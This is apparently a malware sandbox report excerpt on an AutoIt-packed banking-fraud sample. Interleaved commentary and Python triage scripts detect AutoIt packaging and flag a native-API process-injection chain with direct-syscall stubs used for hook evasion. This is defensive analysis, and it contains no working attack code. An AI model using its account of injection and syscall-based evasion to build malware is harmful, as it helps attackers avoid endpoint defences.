                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BE5000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3158332138.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: Atuserer.exe, 00000007.00000003.1908966145.0000000007A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003B407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_003B407C
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003B427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_003B427A
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003B407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_003B407C
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,2_2_003A003A
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003CCB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_003CCB26

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 4.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3153276903.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1675780203.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1675422438.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3163418586.0000000000E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3166059888.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1676172842.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3158152521.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3163670686.00000000023F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: This is a third-party compiled AutoIt script.2_2_00343B4C
                Source: RO2Y11yOJ7.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: RO2Y11yOJ7.exe, 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_33a1b54c-9
                Source: RO2Y11yOJ7.exe, 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_387471c4-e
                Source: RO2Y11yOJ7.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_82ec3c63-e
                Source: RO2Y11yOJ7.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_af3bc0f2-1
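The banner "This is a third-party compiled AutoIt script." and the string table around it (the "runas" handling with SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeBackupPrivilege and SeRestorePrivilege, the AutoIt3GUI window class) are the AutoIt3 runtime's own strings and ship with every compiled AutoIt binary, so they identify the packaging of RO2Y11yOJ7.exe, not the FormBook payload it unpacks. A quick triage check for that packaging, added here as an example and not part of the Joe Sandbox report, is below. The first two markers come from the report above; the "AU3!EA06" magic is the well-known signature of the embedded compiled-script resource and is my addition, not something the report shows. The buffer it is run against is constructed from the string fragment quoted above, not the real sample.

```python
# Indicators of an AutoIt3-compiled executable. "runtime banner" and
# "gui class" appear verbatim in the report above; "script resource magic"
# (AU3!EA06) is the known signature of the embedded script and is assumed here.
AUTOIT_MARKERS = {
    "runtime banner": b"This is a third-party compiled AutoIt script.",
    "gui class": b"AutoIt3GUI",
    "script resource magic": b"AU3!EA06",
}

# Strings that belong to the AutoIt RunAs implementation; seeing them next to
# the banner is expected and says nothing about the payload.
RUNTIME_NOISE = (
    b"SeAssignPrimaryTokenPrivilege",
    b"SeIncreaseQuotaPrivilege",
    b"SeBackupPrivilege",
    b"SeRestorePrivilege",
)


def find_all(data: bytes, needle: bytes) -> list:
    """Every offset at which `needle` occurs in `data`."""
    offsets, pos = [], data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


def find_autoit_markers(data: bytes) -> dict:
    """Return {label: [offsets]} for each AutoIt marker present in `data`."""
    hits = {}
    for label, marker in AUTOIT_MARKERS.items():
        offsets = find_all(data, marker)
        if offsets:
            hits[label] = offsets
    return hits


def is_compiled_autoit(data: bytes) -> bool:
    """Either the runtime banner or the script resource magic is conclusive."""
    hits = find_autoit_markers(data)
    return "runtime banner" in hits or "script resource magic" in hits


def runtime_noise_present(data: bytes) -> list:
    """Which AutoIt RunAs privilege strings are in the file (expected, benign)."""
    return [s.decode() for s in RUNTIME_NOISE if s in data]


def scan_file(path: str) -> dict:
    with open(path, "rb") as fh:
        data = fh.read()
    return {
        "compiled_autoit": is_compiled_autoit(data),
        "markers": find_autoit_markers(data),
        "runtime_noise": runtime_noise_present(data),
    }


# Constructed sample buffer (not the real sample): a fragment of the string
# table quoted in the report, padded with filler bytes.
SAMPLE_BUFFER = (
    b"\x00" * 64
    + b'IPC$This is a third-party compiled AutoIt script."runas'
    + b"Error allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilege"
    + b"\x00" * 32
    + b'ThumbnailClassAutoIt3GUIContainer"'
    + b"\x00" * 16
)

if __name__ == "__main__":
    print(find_autoit_markers(SAMPLE_BUFFER))
    print(is_compiled_autoit(SAMPLE_BUFFER), runtime_noise_present(SAMPLE_BUFFER))
```

The useful output of such a check is the decision to unpack the embedded script (the AutoIt layer is a loader) rather than to spend time on the runtime's own API usage; the clipboard, keyboard-state and shutdown functions listed for RO2Y11yOJ7.exe above are likewise AutoIt library code that every compiled script carries.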
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004EC823 NtClose,4_2_004EC823
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72B60 NtClose,LdrInitializeThunk,4_2_02F72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02F72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F735C0 NtCreateMutant,LdrInitializeThunk,4_2_02F735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F74340 NtSetContextThread,4_2_02F74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F74650 NtSuspendThread,4_2_02F74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72AF0 NtWriteFile,4_2_02F72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72AD0 NtReadFile,4_2_02F72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72AB0 NtWaitForSingleObject,4_2_02F72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72BF0 NtAllocateVirtualMemory,4_2_02F72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72BE0 NtQueryValueKey,4_2_02F72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72BA0 NtEnumerateValueKey,4_2_02F72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72B80 NtQueryInformationFile,4_2_02F72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72EE0 NtQueueApcThread,4_2_02F72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72EA0 NtAdjustPrivilegesToken,4_2_02F72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72E80 NtReadVirtualMemory,4_2_02F72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72E30 NtWriteVirtualMemory,4_2_02F72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72FE0 NtCreateFile,4_2_02F72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72FB0 NtResumeThread,4_2_02F72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72FA0 NtQuerySection,4_2_02F72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72F90 NtProtectVirtualMemory,4_2_02F72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72F60 NtCreateProcessEx,4_2_02F72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72F30 NtCreateSection,4_2_02F72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72CF0 NtOpenProcess,4_2_02F72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72CC0 NtQueryVirtualMemory,4_2_02F72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72CA0 NtQueryInformationToken,4_2_02F72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72C70 NtFreeVirtualMemory,4_2_02F72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72C60 NtCreateKey,4_2_02F72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72C00 NtQueryInformationProcess,4_2_02F72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72DD0 NtDelayExecution,4_2_02F72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72DB0 NtEnumerateKey,4_2_02F72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72D30 NtUnmapViewOfSection,4_2_02F72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72D10 NtMapViewOfSection,4_2_02F72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72D00 NtSetInformationFile,4_2_02F72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F73090 NtSetValueKey,4_2_02F73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F73010 NtOpenDirectoryObject,4_2_02F73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F739B0 NtGetContextThread,4_2_02F739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F73D70 NtOpenThread,4_2_02F73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F73D10 NtOpenProcessToken,4_2_02F73D10
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F4650 NtSuspendThread,LdrInitializeThunk,7_2_048F4650
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F4340 NtSetContextThread,LdrInitializeThunk,7_2_048F4340
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_048F2CA0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2C60 NtCreateKey,LdrInitializeThunk,7_2_048F2C60
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_048F2C70
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2DD0 NtDelayExecution,LdrInitializeThunk,7_2_048F2DD0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_048F2DF0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_048F2D10
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_048F2D30
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_048F2E80
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_048F2EE0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2FB0 NtResumeThread,LdrInitializeThunk,7_2_048F2FB0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2FE0 NtCreateFile,LdrInitializeThunk,7_2_048F2FE0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2F30 NtCreateSection,LdrInitializeThunk,7_2_048F2F30
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2AD0 NtReadFile,LdrInitializeThunk,7_2_048F2AD0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2AF0 NtWriteFile,LdrInitializeThunk,7_2_048F2AF0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_048F2BA0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_048F2BE0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_048F2BF0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2B60 NtClose,LdrInitializeThunk,7_2_048F2B60
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F35C0 NtCreateMutant,LdrInitializeThunk,7_2_048F35C0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F39B0 NtGetContextThread,LdrInitializeThunk,7_2_048F39B0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2CC0 NtQueryVirtualMemory,7_2_048F2CC0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2CF0 NtOpenProcess,7_2_048F2CF0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2C00 NtQueryInformationProcess,7_2_048F2C00
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2DB0 NtEnumerateKey,7_2_048F2DB0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2D00 NtSetInformationFile,7_2_048F2D00
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2EA0 NtAdjustPrivilegesToken,7_2_048F2EA0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2E30 NtWriteVirtualMemory,7_2_048F2E30
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2F90 NtProtectVirtualMemory,7_2_048F2F90
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2FA0 NtQuerySection,7_2_048F2FA0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2F60 NtCreateProcessEx,7_2_048F2F60
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2AB0 NtWaitForSingleObject,7_2_048F2AB0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2B80 NtQueryInformationFile,7_2_048F2B80
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F3090 NtSetValueKey,7_2_048F3090
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F3010 NtOpenDirectoryObject,7_2_048F3010
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F3D10 NtOpenProcessToken,7_2_048F3D10
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F3D70 NtOpenThread,7_2_048F3D70
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00848F90 NtCreateFile,7_2_00848F90
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_008491F0 NtDeleteFile,7_2_008491F0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00849100 NtReadFile,7_2_00849100
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_008492A0 NtClose,7_2_008492A0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00849400 NetpMergeFtinfo,NtAllocateVirtualMemory,7_2_00849400
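The long run of Nt* entries for svchost.exe (0x02F72AB0 to 0x02F74650) and Atuserer.exe (0x048F2AB0 to 0x048F4650) are not calls into the mapped ntdll.dll image: each set sits in a small private block, spaced like ntdll's export stubs, which is consistent with the report's "Found direct / indirect Syscall" signature and with a payload that invokes system calls through its own copy of the stubs rather than through user-mode hooks. Read together, the names are a complete process-injection toolkit: NtOpenProcess, NtAllocateVirtualMemory or NtCreateSection plus NtMapViewOfSection, NtWriteVirtualMemory, and NtQueueApcThread or NtSetContextThread plus NtResumeThread, which matches the "Queues an APC in another process" and "Modifies the context of a thread in another process" signatures. The script below is added here as an example and is not part of the Joe Sandbox report. It parses a constructed sample of these "Code function" entries copied from above, collects the native functions per process, checks whether a full injection chain is present, and clusters the stub addresses so the private stub block stands apart from the NtClose at 0x004EC823 inside the unpacked payload at 0x4C0000 (the region the Yara matches in the E-Banking Fraud section point at). The stage labels and the 0x1000-byte cluster gap are my own choices.

```python
import re
from collections import defaultdict

# One "Code function" entry of the report. The function id (pid_run_addr) is
# repeated at the end of the line, which the back-references use as an anchor.
ENTRY_RE = re.compile(
    r"Source: (?P<image>.+?)Code function: "
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-F]+) "
    r"(?P<calls>.+?),(?P=pid)_(?P=run)_(?P=addr)$"
)

# Native-API primitives that together make up an APC / thread-hijack injection.
# Stage labels are my own; a stage counts as present if any primitive is seen.
INJECTION_STAGES = {
    "target handle": {"NtOpenProcess", "NtCreateProcessEx"},
    "remote memory": {"NtAllocateVirtualMemory", "NtMapViewOfSection"},
    "payload write": {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "execution": {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread"},
}

# Constructed sample: entries copied verbatim from the System Summary above.
SAMPLE = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004EC823 NtClose,4_2_004EC823
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72B60 NtClose,LdrInitializeThunk,4_2_02F72B60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F735C0 NtCreateMutant,LdrInitializeThunk,4_2_02F735C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F74340 NtSetContextThread,4_2_02F74340
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F74650 NtSuspendThread,4_2_02F74650
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72BF0 NtAllocateVirtualMemory,4_2_02F72BF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72EE0 NtQueueApcThread,4_2_02F72EE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72E30 NtWriteVirtualMemory,4_2_02F72E30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72FB0 NtResumeThread,4_2_02F72FB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72CF0 NtOpenProcess,4_2_02F72CF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F72D10 NtMapViewOfSection,4_2_02F72D10
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F739B0 NtGetContextThread,4_2_02F739B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F73D70 NtOpenThread,4_2_02F73D70
Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F4650 NtSuspendThread,LdrInitializeThunk,7_2_048F4650
Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F4340 NtSetContextThread,LdrInitializeThunk,7_2_048F4340
Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_048F2EE0
Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_048F2BF0
Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F35C0 NtCreateMutant,LdrInitializeThunk,7_2_048F35C0
Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F39B0 NtGetContextThread,LdrInitializeThunk,7_2_048F39B0
Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2CF0 NtOpenProcess,7_2_048F2CF0
Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F2E30 NtWriteVirtualMemory,7_2_048F2E30
Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F3D70 NtOpenThread,7_2_048F3D70
Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00848F90 NtCreateFile,7_2_00848F90
Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00849400 NetpMergeFtinfo,NtAllocateVirtualMemory,7_2_00849400
"""


def parse_entries(text: str) -> list:
    """Parse report lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.strip().splitlines():
        m = ENTRY_RE.match(line.strip())
        if not m:
            continue
        entries.append({
            "image": m["image"].rsplit("\\", 1)[-1],   # basename of the process
            "pid": int(m["pid"]),
            "addr": int(m["addr"], 16),
            "calls": [c for c in m["calls"].split(",") if c],
        })
    return entries


def native_calls_by_process(entries: list) -> dict:
    """Map (image, pid) -> {Nt* name: [addresses of functions calling it]}."""
    out = defaultdict(lambda: defaultdict(list))
    for e in entries:
        for name in e["calls"]:
            if name.startswith("Nt"):
                out[(e["image"], e["pid"])][name].append(e["addr"])
    return out


def injection_stages_present(nt_names) -> list:
    """Stage labels for which at least one primitive appears in nt_names."""
    seen = set(nt_names)
    return [stage for stage, prims in INJECTION_STAGES.items() if prims & seen]


def stub_clusters(addresses, gap: int = 0x1000) -> list:
    """Group sorted addresses whose neighbour lies within `gap` bytes.
    Returns [(lowest, highest, count)] so a tight block of stubs is visible."""
    clusters = []
    for a in sorted(set(addresses)):
        if clusters and a - clusters[-1][1] <= gap:
            lo, hi, n = clusters[-1]
            clusters[-1] = (lo, a, n + 1)
        else:
            clusters.append((a, a, 1))
    return clusters


def triage(text: str) -> dict:
    """Per process: native functions seen, injection stages, and stub clusters."""
    report = {}
    for key, nt in native_calls_by_process(parse_entries(text)).items():
        stages = injection_stages_present(nt)
        addrs = [a for lst in nt.values() for a in lst]
        report[key] = {
            "nt_functions": sorted(nt),
            "stages": stages,
            "full_chain": len(stages) == len(INJECTION_STAGES),
            "clusters": stub_clusters(addrs),
        }
    return report


if __name__ == "__main__":
    for (image, pid), info in triage(SAMPLE).items():
        print(f"{image} (pid {pid}): full injection chain = {info['full_chain']}")
        for lo, hi, n in info["clusters"]:
            print(f"  {n:2d} native-API stub(s) in 0x{lo:08X}-0x{hi:08X} (span 0x{hi - lo:X})")
```

For the sample, both processes come out with the full chain, and each shows two clusters: the payload image region (0x004EC823 in svchost.exe; 0x00848F90 to 0x00849400 in Atuserer.exe) and a separate block of a dozen stubs spanning under 0x2000 bytes. That second block is the thing to carve from the memory dump and diff against the on-disk ntdll.dll stubs; a byte-identical copy of ntdll's Nt* prologues at a non-image address is strong evidence for the hook-evasion technique the signature describes.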
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AA279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,2_2_003AA279
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003988D9 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,2_2_003988D9
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_003A5264
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0034E8002_2_0034E800
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0036DAF52_2_0036DAF5
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0034E0602_2_0034E060
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003541402_2_00354140
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003623452_2_00362345
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003C04652_2_003C0465
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003764522_2_00376452
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0034C5B12_2_0034C5B1
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003725AE2_2_003725AE
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0036277A2_2_0036277A
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003568412_2_00356841
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003C08E22_2_003C08E2
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A89322_2_003A8932
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0039E9282_2_0039E928
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0037890F2_2_0037890F
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003589682_2_00358968
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003769C42_2_003769C4
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0036CCA12_2_0036CCA1
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00376F362_2_00376F36
